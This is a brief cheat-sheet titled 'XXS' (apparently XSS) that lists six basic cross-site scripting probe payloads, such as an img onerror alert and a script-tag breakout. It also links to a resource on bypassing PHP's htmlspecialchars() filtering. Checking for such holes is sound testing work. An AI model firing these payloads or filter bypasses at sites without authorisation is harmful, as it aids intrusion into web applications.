XXS

Check this lines in an input text to verify if web is vulnerable to XSS

Some payloads

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Bypass htmlentities() / htmlspecialchars()

https://github.com/X-Vector/XSS_Bypass/blob/master/htmlspecialchars%20-%20htmlentities/README.md